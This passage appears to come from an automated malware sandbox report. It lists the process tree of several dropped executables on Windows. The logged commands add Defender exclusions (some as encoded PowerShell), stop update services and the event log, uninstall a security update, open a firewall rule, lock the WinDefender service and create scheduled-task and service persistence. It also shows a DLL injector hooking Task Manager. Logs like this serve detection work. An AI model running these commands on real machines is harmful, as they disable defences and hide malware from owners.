C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 716
5⤵
- Program crash
PID:5008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 748
5⤵
- Program crash
PID:2336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 636
5⤵
- Program crash
PID:3812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 768
5⤵
- Program crash
PID:3416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724
5⤵
- Program crash
PID:3748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 800
5⤵
- Program crash
PID:4596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724
5⤵
- Program crash
PID:2860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 888
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 884
5⤵
- Program crash
PID:2528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 904
5⤵
- Program crash
PID:3324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 984
5⤵
- Program crash
PID:4344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 896
5⤵
- Program crash
PID:3056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 616
5⤵
- Program crash
PID:2316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 388
5⤵
- Program crash
PID:1580

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
5⤵
PID:2820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 656
6⤵
- Program crash
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 692
6⤵
- Program crash
PID:2316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 692
6⤵
- Program crash
PID:2480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 748
6⤵
- Program crash
PID:4336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 712
6⤵
- Program crash
PID:3896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:3068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 720
6⤵
- Program crash
PID:3808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 356
6⤵
- Program crash
PID:1984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 352
6⤵
- Program crash
PID:3472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 336
6⤵
- Program crash
PID:2104

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
6⤵
PID:5064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:1540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:3708

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
6⤵
PID:2528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 372
7⤵
- Program crash
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 388
7⤵
- Program crash
PID:2016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 388
7⤵
- Program crash
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 612
7⤵
- Program crash
PID:2972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 728
7⤵
- Program crash
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 784
7⤵
- Executes dropped EXE
- Program crash
- Suspicious use of WriteProcessMemory
PID:2876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:2480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 804
7⤵
- Program crash
PID:528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 768
7⤵
- Program crash
PID:856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 768
7⤵
- Program crash
PID:2392

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:2900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 644
7⤵
- Program crash
PID:4960

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
7⤵
PID:4528

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
7⤵
- Creates scheduled task(s)
PID:1504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 892
7⤵
- Program crash
PID:2452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 612
7⤵
- Program crash
PID:3884

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
7⤵
PID:2900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 972
7⤵
- Program crash
PID:2972

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
7⤵
- Creates scheduled task(s)
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 648
7⤵
- Program crash
PID:4200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 956
7⤵
- Program crash
PID:1348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1068
7⤵
- Program crash
PID:4688

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
7⤵
PID:3852

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
PID:940

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
9⤵
- Launches sc.exe
PID:2716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1148
7⤵
- Program crash
PID:3920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1164
7⤵
- Program crash
PID:4040

C:\Users\Admin\AppData\Local\Temp\rty25.exe
"C:\Users\Admin\AppData\Local\Temp\rty25.exe"
4⤵
- Executes dropped EXE
PID:4920

C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"
4⤵
- Executes dropped EXE
PID:2968

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
PID:1132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:5052

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:1984

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:1128

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:3708

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:4996

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:2692

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:4664

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
5⤵
- Launches sc.exe
PID:3860

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
PID:2412

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
PID:3604

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
PID:1516

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
PID:1464

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
5⤵
- Launches sc.exe
PID:688

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
5⤵
- Launches sc.exe
PID:452

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
5⤵
- Launches sc.exe
PID:516

C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
4⤵
PID:4880

C:\Users\Admin\AppData\Local\Temp\1000560001\kskskfsf.exe
"C:\Users\Admin\AppData\Local\Temp\1000560001\kskskfsf.exe"
3⤵
- Executes dropped EXE
PID:1532

C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe
"C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe"
3⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe
"C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe"
3⤵
PID:4164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
4⤵
PID:224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2092

C:\Windows\system32\mode.com
mode 65,10
5⤵
PID:1048

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
5⤵
PID:3092

C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe
"xfAk7rC2FeEN35Y8o.exe"
5⤵
PID:968

C:\Windows\system32\attrib.exe
attrib +H "xfAk7rC2FeEN35Y8o.exe"
5⤵
- Views/modifies file attributes
PID:4828

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
5⤵
PID:2972

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
5⤵
PID:2716

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
5⤵
PID:5068

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
5⤵
PID:1600

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
5⤵
PID:4200

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
5⤵
PID:1172

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_8.zip -oextracted
5⤵
PID:1516

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_9.zip -oextracted
5⤵
PID:3164

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p4632370330209207692137030328 -oextracted
5⤵
PID:968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
6⤵
PID:1620

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjADUAVQBDACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBwAEIASwB1AEUAVwA1AHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBtAGIAbgBvAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBhADEAbAAzADIAWgBtAFMASAB1ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
7⤵
PID:4376

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADUAVQBDACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBwAEIASwB1AEUAVwA1AHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBtAGIAbgBvAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBhADEAbAAzADIAWgBtAFMASAB1ACMAPgA="
8⤵
PID:3360

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6900" /TR "C:\ProgramData\Dllhost\dllhost.exe"
7⤵
PID:856

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
7⤵
PID:1892

C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe
"C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe"
3⤵
PID:4592

C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe
"C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe"
3⤵
PID:4616

C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe
"C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe"
3⤵
PID:2388

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
"C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMAA1ADcAMQAwADAAMQBcAEcAegB4AHoAdQBoAGUAagBkAGEAYgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAARwB6AHgAegB1AGgAZQBqAGQAYQBiAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABrAGoAaABrAGgAawBoAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAGsAagBoAGsAaABrAGgAawAuAGUAeABlAA==
4⤵
PID:2204

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
4⤵
PID:2836

C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe"
3⤵
PID:5064

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:116

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:688

C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe
"C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"
3⤵
PID:5104

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "FLWCUERA"
4⤵
- Launches sc.exe
PID:4752

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
4⤵
- Launches sc.exe
PID:2340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"
4⤵
PID:3324

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:2172

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "FLWCUERA"
4⤵
- Launches sc.exe
PID:4960

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
4⤵
- Launches sc.exe
PID:672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 352
1⤵
- Program crash
PID:812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 876 -ip 876
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 876 -ip 876
1⤵
PID:3900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 876 -ip 876
1⤵
PID:1128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
1⤵
PID:2496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 876 -ip 876
1⤵
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
1⤵
PID:2236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 876 -ip 876
1⤵
PID:1248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 876 -ip 876
1⤵
PID:2896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
1⤵
PID:4036

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 876 -ip 876
1⤵
PID:1600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876
1⤵
PID:4504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
1⤵
PID:1360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 876 -ip 876
1⤵
PID:4824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 876 -ip 876
1⤵
PID:2828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 876 -ip 876
1⤵
PID:2336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 876 -ip 876
1⤵
PID:4200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876
1⤵
PID:2392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 876 -ip 876
1⤵
PID:4632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876
1⤵
PID:1660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4880 -ip 4880
1⤵
PID:1340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2820 -ip 2820
1⤵
PID:4160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820
1⤵
PID:4804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2820 -ip 2820
1⤵
PID:4704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2820 -ip 2820
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2820 -ip 2820
1⤵
PID:1172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2820 -ip 2820
1⤵
PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820
1⤵
PID:1496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2820 -ip 2820
1⤵
PID:1600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820
1⤵
PID:4616

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:4616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2528 -ip 2528
1⤵
PID:2144

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
1⤵
PID:620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2528 -ip 2528
1⤵
PID:4504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2528 -ip 2528
1⤵
PID:2716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2528 -ip 2528
1⤵
PID:712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2528 -ip 2528
1⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2528 -ip 2528
1⤵
PID:1660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2528 -ip 2528
1⤵
PID:3076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2528 -ip 2528
1⤵
PID:1540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2528 -ip 2528
1⤵
PID:528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2528 -ip 2528
1⤵
PID:456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1084 -ip 1084
1⤵
PID:4632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2528 -ip 2528
1⤵
PID:2516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2528 -ip 2528
1⤵
PID:1092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2528 -ip 2528
1⤵
PID:4884

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
1⤵
PID:4296

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:2896

C:\Windows\system32\conhost.exe
conhost.exe
2⤵
PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2528 -ip 2528
1⤵
PID:412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2528 -ip 2528
1⤵
PID:688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2528 -ip 2528
1⤵
PID:2452

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:1288

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
PID:1512

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
PID:4932

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:5112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:3228

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:1132

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:4744

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:1220

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:3564

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:3736

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:1240

C:\Windows\system32\powercfg.exe
